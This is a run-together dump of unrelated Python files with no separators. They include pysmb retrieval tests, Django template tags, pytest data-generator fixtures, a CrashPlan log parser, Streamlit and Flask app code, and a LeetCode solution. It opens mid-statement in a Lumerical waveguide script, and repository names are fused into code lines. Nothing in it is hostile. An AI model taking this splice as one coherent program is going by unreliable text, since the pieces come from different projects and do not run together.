os.path.isdir(self.gds_dir): os.mkdir(self.gds_dir) if __name__ == "__main__": # Test 1: Generate raw GDS and generate geometry in Lumerical # gds_file = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))),r"design_automation\Waveguide\Waveguide_w=100nm.gds") # design_file = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))),r"design_automation\Waveguide\Waveguide_design.yml") # process_file = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))),"yaml_processes","SiEPICfab-Grouse-Base.lbr") # mode = lumapi.MODE(hide = False) # WGS = WaveguideStripGeometry(design_file, process_file, mode) # generate_lum_geometry(mode, process_file, gds_file) # Test 2: Generate PCell GDS sweeping radius gds_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),"gds","Waveguide_r=1000nm.gds") design_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),"Waveguide_design.yml") process_file = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))),"yaml_processes","SiEPICfab-Grouse-Base.lbr") fdtd = lumapi.FDTD(hide = False) WGS1 = WaveguideStripGeometry(design_file, process_file, fdtd) WGS1.sweep_radius(0.5,[1,2],1) generate_lum_geometry(fdtd, process_file, gds_file) # Test 3: Generate PCell GDS sweeping bezier # gds_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),"Waveguide_r=1000nm.gds") # design_file = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))),r"design_automation\Waveguide\Waveguide_design.yml") # process_file = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))),"yaml_processes","SiEPICfab-Grouse-Base.lbr") # WGS1 = WaveguideStripGeometry(design_file, process_file) # WGS1.sweep_bezier(0.5, 5, [0.1,0.2],0.1) # -*- coding: utf-8 -*- import os, tempfile from io import BytesIO from smb.SMBConnection import SMBConnection from smb.smb2_constants import SMB2_DIALECT_2 from .util import getConnectionInfo from nose.tools import with_setup from smb import smb_structs try: import hashlib def MD5(): 
return hashlib.md5() except ImportError: import md5 def MD5(): return md5.new() conn = None def setup_func_SMB1(): global conn smb_structs.SUPPORT_SMB2 = smb_structs.SUPPORT_SMB2x = False info = getConnectionInfo() conn = SMBConnection(info['user'], info['password'], info['client_name'], info['server_name'], use_ntlm_v2 = True, is_direct_tcp = True) assert conn.connect(info['server_ip'], info['server_port']) def setup_func_SMB2(): global conn smb_structs.SUPPORT_SMB2 = True smb_structs.SUPPORT_SMB2x = False info = getConnectionInfo() conn = SMBConnection(info['user'], info['password'], info['client_name'], info['server_name'], use_ntlm_v2 = True, is_direct_tcp = True) assert conn.connect(info['server_ip'], info['server_port']) def setup_func_SMB2x(): global conn smb_structs.SUPPORT_SMB2 = smb_structs.SUPPORT_SMB2x = True info = getConnectionInfo() conn = SMBConnection(info['user'], info['password'], info['client_name'], info['server_name'], use_ntlm_v2 = True, is_direct_tcp = True) assert conn.connect(info['server_ip'], info['server_port']) def teardown_func(): global conn conn.close() @with_setup(setup_func_SMB1, teardown_func) def test_retr_multiplereads_SMB1(): # Test file retrieval using multiple ReadAndx calls (assuming each call will not reach more than 65534 bytes) global conn temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', '/rfc1001.txt', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '5367c2bbf97f521059c78eab65309ad3' assert filesize == 158437 temp_fh.close() @with_setup(setup_func_SMB2, teardown_func) def test_retr_multiplereads_SMB2(): # Test file retrieval using multiple ReadAndx calls (assuming each call will not reach more than 65534 bytes) global conn assert conn.smb2_dialect == SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', '/rfc1001.txt', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '5367c2bbf97f521059c78eab65309ad3' assert filesize == 158437 temp_fh.close() @with_setup(setup_func_SMB2x, teardown_func) def test_retr_multiplereads_SMB2x(): # Test file retrieval using multiple ReadAndx calls (assuming each call will not reach more than 65534 bytes) global conn assert conn.smb2_dialect != SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', '/rfc1001.txt', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '5367c2bbf97f521059c78eab65309ad3' assert filesize == 158437 temp_fh.close() @with_setup(setup_func_SMB1, teardown_func) def test_retr_longfilename_SMB1(): # Test file retrieval that has a long English filename global conn temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', '/Implementing CIFS - SMB.html', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '671c5700d279fcbbf958c1bba3c2639e' assert filesize == 421269 temp_fh.close() @with_setup(setup_func_SMB2, teardown_func) def test_retr_longfilename_SMB2(): # Test file retrieval that has a long English filename global conn assert conn.smb2_dialect == SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', '/Implementing CIFS - SMB.html', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '671c5700d279fcbbf958c1bba3c2639e' assert filesize == 421269 temp_fh.close() @with_setup(setup_func_SMB2x, teardown_func) def test_retr_longfilename_SMB2x(): # Test file retrieval that has a long English filename global conn assert 
conn.smb2_dialect != SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', '/Implementing CIFS - SMB.html', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '671c5700d279fcbbf958c1bba3c2639e' assert filesize == 421269 temp_fh.close() @with_setup(setup_func_SMB1, teardown_func) def test_retr_unicodefilename_SMB1(): # Test file retrieval that has a long non-English filename inside a folder with a non-English name global conn temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '8a44c1e80d55e91c92350955cdf83442' assert filesize == 256000 temp_fh.close() @with_setup(setup_func_SMB2, teardown_func) def test_retr_unicodefilename_SMB2(): # Test file retrieval that has a long non-English filename inside a folder with a non-English name global conn assert conn.smb2_dialect == SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '8a44c1e80d55e91c92350955cdf83442' assert filesize == 256000 temp_fh.close() @with_setup(setup_func_SMB2x, teardown_func) def test_retr_unicodefilename_SMB2x(): # Test file retrieval that has a long non-English filename inside a folder with a non-English name global conn assert conn.smb2_dialect != SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '8a44c1e80d55e91c92350955cdf83442' assert filesize == 256000 temp_fh.close() @with_setup(setup_func_SMB1, teardown_func) def test_retr_offset_SMB1(): # Test file retrieval from offset to EOF global conn temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == 'a141bd8024571ce7cb5c67f2b0d8ea0b' assert filesize == 156000 temp_fh.close() @with_setup(setup_func_SMB2, teardown_func) def test_retr_offset_SMB2(): # Test file retrieval from offset to EOF global conn assert conn.smb2_dialect == SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == 'a141bd8024571ce7cb5c67f2b0d8ea0b' assert filesize == 156000 temp_fh.close() @with_setup(setup_func_SMB2x, teardown_func) def test_retr_offset_SMB2x(): # Test file retrieval from offset to EOF global conn assert conn.smb2_dialect != SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == 'a141bd8024571ce7cb5c67f2b0d8ea0b' assert filesize == 156000 temp_fh.close() @with_setup(setup_func_SMB1, teardown_func) def test_retr_offset_and_biglimit_SMB1(): # Test file retrieval from offset with a big max_length global conn temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 100000) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '83b7afd7c92cdece3975338b5ca0b1c5' assert filesize == 100000 temp_fh.close() @with_setup(setup_func_SMB2, teardown_func) def test_retr_offset_and_biglimit_SMB2(): # Test file 
retrieval from offset with a big max_length global conn assert conn.smb2_dialect == SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 100000) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '83b7afd7c92cdece3975338b5ca0b1c5' assert filesize == 100000 temp_fh.close() @with_setup(setup_func_SMB2x, teardown_func) def test_retr_offset_and_biglimit_SMB2x(): # Test file retrieval from offset with a big max_length global conn assert conn.smb2_dialect != SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 100000) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '83b7afd7c92cdece3975338b5ca0b1c5' assert filesize == 100000 temp_fh.close() @with_setup(setup_func_SMB1, teardown_func) def test_retr_offset_and_smalllimit_SMB1(): # Test file retrieval from offset with a small max_length global conn temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 10) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '746f60a96b39b712a7b6e17ddde19986' assert filesize == 10 temp_fh.close() @with_setup(setup_func_SMB2, teardown_func) def test_retr_offset_and_smalllimit_SMB2(): # Test file retrieval from offset with a small max_length global conn assert conn.smb2_dialect == SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 10) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '746f60a96b39b712a7b6e17ddde19986' assert filesize == 10 temp_fh.close() @with_setup(setup_func_SMB2x, teardown_func) def test_retr_offset_and_smalllimit_SMB2x(): # Test file retrieval from offset with a small max_length global conn assert conn.smb2_dialect != SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 10) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '746f60a96b39b712a7b6e17ddde19986' assert filesize == 10 temp_fh.close() @with_setup(setup_func_SMB1, teardown_func) def test_retr_offset_and_zerolimit_SMB1(): # Test file retrieval from offset to EOF with max_length=0 global conn temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 0) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == 'd41d8cd98f00b204e9800998ecf8427e' assert filesize == 0 temp_fh.close() @with_setup(setup_func_SMB2, teardown_func) def test_retr_offset_and_zerolimit_SMB2(): # Test file retrieval from offset to EOF with max_length=0 global conn assert conn.smb2_dialect == SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 0) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == 'd41d8cd98f00b204e9800998ecf8427e' assert filesize == 0 temp_fh.close() @with_setup(setup_func_SMB2x, teardown_func) def test_retr_offset_and_zerolimit_SMB2x(): # Test file retrieval from offset to EOF with max_length=0 global conn assert conn.smb2_dialect != SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', 
u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 0) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == 'd41d8cd98f00b204e9800998ecf8427e' assert filesize == 0 temp_fh.close() yejia/osl_notebook from django import template register = template.Library() from notebook.snippets.models import Snippet from notebook.bookmarks.models import Bookmark from notebook.scraps.models import Scrap from notebook.notes.models import Frame, Note from notebook.notes.constants import * @register.inclusion_tag('framebook/notes/note/children.html', takes_context=True) def tree_view_tag(context, frame): frame.owner_name = context['profile_username'] #print 'frame.owner_name:', frame.owner_name sort = context['sort'] children = frame.get_notes_in_order(sort) for child in children: child.owner_name = frame.owner_name return {'children': children, 'profile_username':context['profile_username'], \ 'book_uri_prefix':context['book_uri_prefix'], 'sort':sort, 'pick_lang':context['pick_lang'], 'parent_frame_id':frame.id, 'user':context['user']} #parent_frame_id used for removing note from frame. @register.inclusion_tag('framebook/notes/note/children.html', takes_context=True) def social_tree_view_tag(context, frame): sort = context['sort'] children = frame.get_notes_in_order(sort) return {'children': children, \ 'book_uri_prefix':context['book_uri_prefix'], 'sort':sort, 'pick_lang':context['pick_lang']} from notebook.tags.views import AddTagFrameForm @register.inclusion_tag('tagframes/children.html', takes_context=True) def tag_tree_view_tag(context, frame): frame.owner_name = context['profile_username'] #print 'frame.owner_name:', frame.owner_name sort = context['sort'] children = frame.get_tags_in_order(sort) for child in children: child.owner_name = frame.owner_name if child.get_tag_type() == 'Leaf' or child.note_set.count(): child.snippets_count = Snippet.objects.using(child.owner_name).filter(deleted=False, tags=child).count() child.public_snippets_count = Snippet.objects.using(child.owner_name).filter(deleted=False, private=False, tags=child).count() child.bookmarks_count = Bookmark.objects.using(child.owner_name).filter(deleted=False, tags=child).count() child.public_bookmarks_count = Bookmark.objects.using(child.owner_name).filter(deleted=False,private=False, tags=child).count() child.scraps_count = Scrap.objects.using(child.owner_name).filter(deleted=False, tags=child).count() child.public_scraps_count = Scrap.objects.using(child.owner_name).filter(deleted=False, private=False, tags=child).count() child.frames_count = Frame.objects.using(child.owner_name).filter(deleted=False, tags=child).count() child.public_frames_count = Frame.objects.using(child.owner_name).filter(deleted=False, private=False, tags=child).count() child.notes_count = Note.objects.using(child.owner_name).filter(deleted=False, tags=child).count() child.public_notes_count = Note.objects.using(child.owner_name).filter(deleted=False, private=False, tags=child).count() addTagFrameForm = AddTagFrameForm() return {'children': children, 'profile_username':context['profile_username'], \ 'sort':sort, 'addTagFrameForm':addTagFrameForm, 'frame':frame, 'username':context['username'], 'profile_username':context['profile_username'], 'all_words':all_words,'private':context['private'], 'true_words':context['true_words'], 'all_words':context['all_words'], 'false_words':context['false_words'] #'pick_lang':context['pick_lang'] } Problems/0009_Palindrome_Number.py # Runtime: 56 ms, faster than 82.79% of Python3 online submissions for 
Palindrome Number. # Memory Usage: 14.2 MB, less than 51.48% of Python3 online submissions for Palindrome Number. # https://leetcode.com/submissions/detail/592091803/ class Solution: def isPalindrome(self, x: int) -> bool: return str(x) == str(x)[::-1] 10-100 from pytest import fixture @fixture def simple_specification(): return {'size': 100, 'locale': 'pt_BR', 'fields': [{'name': 'id', 'type': 'integer:sequence', 'generator': {}, 'expected': 'int64'}, {'name': 'text', 'type': 'pystr', 'generator': {}, 'expected': 'object'}]} @fixture def argumented_specification(): return {'size': 200, 'locale': 'pt_BR', 'fields': [{'name': 'id', 'type': 'integer:sequence', 'generator': {'start_at': 10, 'step': 2}, 'expected': 'int64'}, {'name': 'date', 'type': 'date_time_between', 'generator': {'start_date': "-10d", 'end_date': '+1y'}, 'expected': 'datetime64[ns]'}]} def sample(type, expected): return {'size': 200, 'locale': 'pt_BR', 'fields': [{'name': 'id', 'type': type, 'generator': {}, 'expected': expected}]} def dataframe_sample(type, expected): return { 'datasets': { 'sample': { 'size': 200, 'locale': 'pt_BR', 'fields': [ { 'name': 'id', 'type': type, 'generator': {}, 'expected': expected } ], 'format': {'type': 'csv'}, 'serializers': { 'to': [ { 'type': 'file', 'uri': '' } ] } } } } def sample_timestamp(type, expected): return {'size': 200, 'locale': 'pt_BR', 'fields': [{'name': 'id', 'type': type, 'generator': { 'start_date': '-1d', 'end_date': '+1d' }, 'expected': expected}]} def sample_timestamp_sequence(type, expected): return {'size': 200, 'locale': 'pt_BR', 'fields': [{'name': 'id', 'type': type, 'generator': { 'start_at': '2019-01-01T01:00:00Z' }, 'expected': expected}]} @fixture def integer_specification(): return sample('pyint', 'int64') @fixture def bool_specification(): return dataframe_sample('boolean', 'bool') @fixture def char_specification(): return sample('pystr', 'object') @fixture def name_specification(): return sample('name', 'object') @fixture def float_specification(): return sample('pyfloat', 'float64') @fixture def timestamp_sequence_specification(): return sample_timestamp_sequence('timestamp:sequence', 'datetime64[ns]') @fixture def integer_sequence_specification(): return sample('integer:sequence', 'int64') @fixture def string_specification(): return sample('pystr', 'object') @fixture def timestamp_specification(): return sample_timestamp('date_time_between', 'datetime64[ns]') @fixture def valid_specification(): return { "datasets": { "teste3": { "fields": [ { "type": "integer:sequence", "name": "id", "generator": { "start_at": 1 } } ], "size": 100, "locale": "pt_BR", "format": { "type": "csv" }, "serializers": { "to": [ { "type": "file", "uri": "/tmp/teste.csv" } ] } } } } @fixture def no_datasets_specification(): return {} @fixture def invalid_no_ids_dataset(): return {"datasets": {}} @fixture def invalid_no_size_dataset(): return {"datasets": { "$id": { "fields": [], "locale": "", "format": {}, "serializers": {} } } } @fixture def invalid_no_locale_dataset(): return {"datasets": { "$id": { "fields": [], "size": 10, "format": {}, "serializers": {} } } } @fixture def invalid_no_size_dryrun(): return {"datasets": { "$id": { "fields": [], "format": {}, "serializers": {} } } } @fixture def invalid_dataset_specification(): return {"datasets": { "teste3": { "fields": [{"type": "integer:sequence", "name": "id", "generator": {"start_at": 1}}], "size": "", "locale": "pt_BR", "format": {"type": "csv"}, "serializers": { "to": [{"type": "file", "uri": "/tmp/teste.csv"}]}}}} 
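# Illustrative usage sketch: pytest injects fixtures by parameter name, so a
# test that needs one of the specifications above simply declares it as an
# argument. The test name and assertions below are hypothetical examples that
# only show the expected shape of a generated spec, assuming these fixtures
# live in a conftest.py visible to the test.
def test_integer_specification_shape(integer_specification):
    spec = integer_specification
    assert spec['size'] == 200
    assert spec['fields'][0]['type'] == 'pyint'
    assert spec['fields'][0]['expected'] == 'int64'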
@fixture def valid_dryrun(): return {"size": 10, "locale": "pt_BR", "fields": [{ "name": "code", "type": "integer:sequence", "generator": {"start_at": 10} }] } @fixture def invalid_dateformat(): return {"datasets": { "teste3": { "fields": [{"type": "integer:sequence", "name": "id", "generator": {"start_at": 1}}, {"type": "date_time", "name": "created_at", "generator": {}}], "size": 1000, "locale": "pt_BR", "format": {"type": "csv", "options": { "header": True, "sep": "," }}, "serializers": { "to": [{"type": "file", "uri": "/tmp/teste.csv"}]}}}} @fixture def malformed_json(): return "[]]" @fixture def unknown_type_spec(): return {"datasets": { "teste3": { "fields": [{"type": "timestamp", "name": "created_at", "generator": {}}], "size": 1000, "locale": "pt_BR", "format": {"type": "csv", "options": { "header": True, "sep": "," }}, "serializers": { "to": [{"type": "file", "uri": "/tmp/teste.csv"}]}}}} @fixture def valid_spec_for_replace_rules(): false = False true = True return { "datasets": { "sample": { "size": 10, "locale": "pt_BR", "fields": [ { "type": "integer:sequence", "name": "id", "generator": { "start_at": 1 } }, { "type": "name", "name": "name", "generator": {} }, { "type": "pyint", "name": "age", "generator": { "max_value": 120 } }, { "type": "pyfloat", "name": "weight", "generator": { "positive": false, "min_value": 0, "max_value": 250 } }, { "type": "job", "name": "job", "generator": {} }, { "type": "future_datetime", "name": "datetime", "generator": {} } ], "format": { "type": "sql", "options": { "table_name": "My_table", "mode": "replace", "schema": { "id": { "sqltype": "INTEGER NOT NULL", "quoted": false }, "name": { "sqltype": "VARCHAR(50)", "quoted": true }, "age": { "sqltype": "INTEGER NOT NULL", "quoted": false }, "weight": { "sqltype": "INTEGER NOT NULL", "quoted": false }, "job": { "sqltype": "VARCHAR(50)", "quoted": true }, "datetime": { "sqltype": "DATETIME", "quoted": false } } } }, "serializers": { "to": [ { "type": "file", "uri": "/home/tadeu/Desktop/dataset.sql" } ] } } } } @fixture def invalid_spec_for_replace_rules_without_schema(): false = False return { "datasets": { "sample": { "size": 10, "locale": "pt_BR", "fields": [ { "type": "integer:sequence", "name": "id", "generator": { "start_at": 1 } }, { "type": "name", "name": "name", "generator": {} }, { "type": "pyint", "name": "age", "generator": { "max_value": 120 } }, { "type": "pyfloat", "name": "weight", "generator": { "positive": false, "min_value": 0, "max_value": 250 } }, { "type": "job", "name": "job", "generator": {} }, { "type": "future_datetime", "name": "datetime", "generator": {} } ], "format": { "type": "sql", "options": { "table_name": "My_table", "mode": "replace" } }, "serializers": { "to": [ { "type": "file", "uri": "/home/tadeu/Desktop/dataset.sql" } ] } } } } @fixture def invalid_spec_for_replace_rules_without_sqltype(): false = False return { "datasets": { "sample": { "size": 10, "locale": "pt_BR", "fields": [ { "type": "integer:sequence", "name": "id", "generator": { "start_at": 1 } }, { "type": "name", "name": "name", "generator": {} }, { "type": "pyint", "name": "age", "generator": { "max_value": 120 } }, { "type": "pyfloat", "name": "weight", "generator": { "positive": false, "min_value": 0, "max_value": 250 } }, { "type": "job", "name": "job", "generator": {} }, { "type": "future_datetime", "name": "datetime", "generator": {} } ], "format": { "type": "sql", "options": { "table_name": "My_table", "mode": "replace", "schema": { "id": { "quoted": false } } } }, "serializers": { "to": [ { 
"type": "file", "uri": "/home/tadeu/Desktop/dataset.sql" } ] } } } } from .reaper import handler vendor/munkireport/crashplan/scripts/crashplan.py #!/usr/bin/python """ extracts information about the external displays from system profiler """ import sys import csv import os import re from datetime import datetime def cp_date_to_unixtimestamp(cp_date): """ Convert Crashplan date to unix timestamp """ dt = datetime.strptime(cp_date, "%m/%d/%y %I:%M%p") #ep = dt.fromtimestamp(0) #diff = dt - ep #return int(diff.total_seconds()) return int(datetime.strftime(dt, "%s")) # Skip manual check if len(sys.argv) > 1: if sys.argv[1] == 'manualcheck': print 'Manual check: skipping' exit(0) crashplan_log="/Library/Logs/CrashPlan/history.log" crashplan_log_0="/Library/Logs/CrashPlan/history.log.0" cacheFile = 'crashplan.txt' # convoluted code because Code42 can't decide what log name formatting to use if os.path.exists(crashplan_log): if os.path.exists(crashplan_log_0): if os.path.getctime(crashplan_log) > os.path.getctime(crashplan_log_0): pass else: crashplan_log = crashplan_log_0 else: pass else: if os.path.exists(crashplan_log_0): crashplan_log = crashplan_log_0 # crashplan logformat regex = re.compile(r'. (\d+\/\d+\/\d+ \d+:\d+[AP]M)\s+(\[[^\]]+\])\s+(.*)') start = 0 destinations = {} if os.path.exists(crashplan_log): with open(crashplan_log, mode='r', buffering=-1) as cplog: for line in cplog: m = regex.match(line) if m: timestamp = cp_date_to_unixtimestamp(m.group(1)) destination = m.group(2) message = m.group(3) # Check if destination is enclosed with [] if not re.match(r'^\[.+\]$', destination): continue if not destinations.get(destination): destinations[destination] = {'destination': destination, 'start': 0, 'last_success': 0, 'duration': 0, 'last_failure': 0, 'reason': ''} if re.match(r'^Starting backup', message): destinations[destination]['start'] = timestamp elif re.match(r'^Completed backup', message): if destinations[destination]['start']: duration = timestamp - destinations[destination]['start'] destinations[destination]['duration'] = duration else: destinations[destination]['duration'] = 0 destinations[destination]['last_success'] = timestamp elif re.match(r'^Stopped backup', message): reason = re.match(r'.*Reason for stopping backup: (.*)', next(cplog)) if reason: if reason.group(1) == "Nothing to do": destinations[destination]['last_success'] = timestamp elif reason.group(1): destinations[destination]['last_failure'] = timestamp destinations[destination]['reason'] = reason.group(1) else: destinations[destination]['last_failure'] = timestamp destinations[destination]['reason'] = 'unknown' else: print "CrashPlan log not found at: %s or %s" % (crashplan_log, crashplan_log_0) # Make sure cachedir exists cachedir = '%s/cache' % os.path.dirname(os.path.realpath(__file__)) if not os.path.exists(cachedir): os.makedirs(cachedir) # Write to file listWriter = csv.DictWriter( open(os.path.join(cachedir, cacheFile), 'wb'), fieldnames=['destination', 'start', 'last_success', 'duration', 'last_failure', 'reason'], delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL ) listWriter.writeheader() for name, values in destinations.iteritems(): listWriter.writerow(values) 0 # Load important libraries import pandas as pd import streamlit as st import os from pages import utils def app(): """This application is created to help the user change the metadata for the uploaded file. They can perform merges. Change column names and so on. 
""" # Load the uploaded data if 'main_data.csv' not in os.listdir('data'): st.markdown("Please upload data through `Upload Data` page!") else: data = pd.read_csv('data/main_data.csv') st.dataframe(data) # Read the column meta data for this dataset col_metadata = pd.read_csv('data/metadata/column_type_desc.csv') ''' Change the information about column types Here the info of the column types can be changed using dropdowns. The page is divided into two columns using beta columns ''' st.markdown("#### Change the information about column types") # Use two column technique col1, col2 = st.columns(2) global name, type # Design column 1 name = col1.selectbox("Select Column", data.columns) # Design column two current_type = col_metadata[col_metadata['column_name'] == name]['type'].values[0] print(current_type) column_options = ['numerical', 'categorical'] current_index = column_options.index(current_type) type = col2.selectbox("Select Column Type", options=column_options, index = current_index) st.write("""Select your column name and the new type from the data. To submit all the changes, click on *Submit changes* """) if st.button("Change Column Type"): # Set the value in the metadata and resave the file # col_metadata = pd.read_csv('data/metadata/column_type_desc.csv') st.dataframe(col_metadata[col_metadata['column_name'] == name]) col_metadata.loc[col_metadata['column_name'] == name, 'type'] = type col_metadata.to_csv('data/metadata/column_type_desc.csv', index = False) st.write("Your changes have been made!") st.dataframe(col_metadata[col_metadata['column_name'] == name]) #Drop columns st.markdown("#### Drop Some columns") #select columns to be dropped cols_drop = st.multiselect("Select Column to drop", options = data.columns) #if drop column button is pushed if st.button("Drop Columns"): if cols_drop is not None: #drop columns and save in new variable new_data = data.drop(cols_drop, axis = 1) #add text indicating columns user dropped st.write("#### You have dropped column(s): {}".format(cols_drop)) #diplay new data preview st.dataframe(new_data.head()) #save metadata of new dataset columns = utils.get_types(new_data) columns.to_csv('data/metadata/new_data_column_type_desc.csv', index = False) #save new data to csv new_data.to_csv('data/new_main_data.csv', index=False)AspirinCode/jupyter-genomics """This module exposes utility functions and classes for working with pandas objects.""" # third-party libraries import pandas __author__ = '' __maintainer__ = "" __email__ = "" __status__ = "prototype" def add_series_to_dataframe(dataframe, series, header): """Insert the input series into the input dataframe with the specified column header. Args: dataframe (pandas.DataFrame): The dataframe to which to add a column; insert is done in-place. series (array-like, dict, or scalar value): The column values to add to the dataframe. header (str): The name to be used for the new column. """ dataframe.loc[:, header] = pandas.Series(series, index=dataframe.index)lsst-sqre/sphinxkit """Tests for the documenteer.stackdocs.doxygentag module. 
""" import importlib.util from pathlib import Path from zipfile import ZipFile import pytest from documenteer.stackdocs.doxygentag import get_tag_entity_names if importlib.util.find_spec("sphinxcontrib.doxylink"): doxylink_installed = True else: doxylink_installed = False @pytest.fixture(scope="session") def tag_path(tmp_path_factory): zipped_path = Path(__file__).parent / "data" / "doxygen.tag.zip" base_dir = tmp_path_factory.mktemp("doxygentag") with ZipFile(zipped_path) as tagzip: tagzip.extract("doxygen.tag", path=base_dir) return base_dir / "doxygen.tag" @pytest.mark.skipif( doxylink_installed is False, reason="sphinxcontrib.doxylink must be installed", ) @pytest.mark.skip(reason="Not currently working") def test_get_tag_entity_names_all(tag_path): names = get_tag_entity_names(tag_path) assert "lsst::afw::table::Schema" in names @pytest.mark.skipif( doxylink_installed is False, reason="sphinxcontrib.doxylink must be installed", ) @pytest.mark.skip(reason="Not currently working") def test_get_tag_entity_names_files(tag_path): names = get_tag_entity_names(tag_path, kinds=["file"]) assert "lsst::afw::table::Schema" not in names for name in names: assert name.endswith(".h") 0 start = int(input()) end = int(input()) magick_num = int(input()) combinations = 0 is_found = False for x1 in range(start, end + 1): for x2 in range(start, end +1): combinations += 1 if x1 + x2 == magick_num: print(f"Combination N:{combinations} ({x1} + {x2} = {magick_num})") is_found = True break if is_found: break if not is_found: print(f'{combinations} combinations - neither equals {magick_num}')app.py # -*- coding: utf-8 -*- from __future__ import absolute_import from flask import Flask from flask_assets import Environment, Bundle import logging from logging.handlers import RotatingFileHandler from platus.web import web from platus.api import api from platus.config import config application = Flask(__name__,\ static_folder="platus/static/",\ template_folder="platus/templates/", static_url_path="/static") application.register_blueprint(web) application.register_blueprint(api) application.config.update(config.from_yaml("data/config.yaml")) # Scss assets = Environment(application) assets.versions = 'timestamp' assets.url_expire = True assets.manifest = 'file:/tmp/manifest.to-be-deployed' # explict filename assets.cache = False assets.auto_build = True assets.url = application.static_url_path scss = Bundle('scss/00_main.scss', filters='pyscss', output='css/main.css', depends=['scss/*.scss']) assets.register('scss_all', scss) assets.debug = False application.config['ASSETS_DEBUG'] = False # Set Logger log_levels = { "info": logging.INFO, "debug": logging.DEBUG, "error": logging.ERROR, "critical": logging.CRITICAL } log_level = log_levels[application.config.get("log_level", "info")] log = logging.getLogger(__name__) console_formatter = logging.Formatter( '%(levelname)s\t%(filename)s:%(lineno)d\t\t%(message)s', '%m-%d %H:%M:%S') file_formatter = logging.Formatter( '%(levelname)s - %(asctime)s - %(pathname)s - %(lineno)d - %(message)s', '%m-%d %H:%M:%S') console_handler = logging.StreamHandler() console_handler.setLevel(log_level) console_handler.setFormatter(console_formatter) rotatingfile_handler = RotatingFileHandler('platus.log', maxBytes=10000, backupCount=1) rotatingfile_handler.setLevel(log_level) 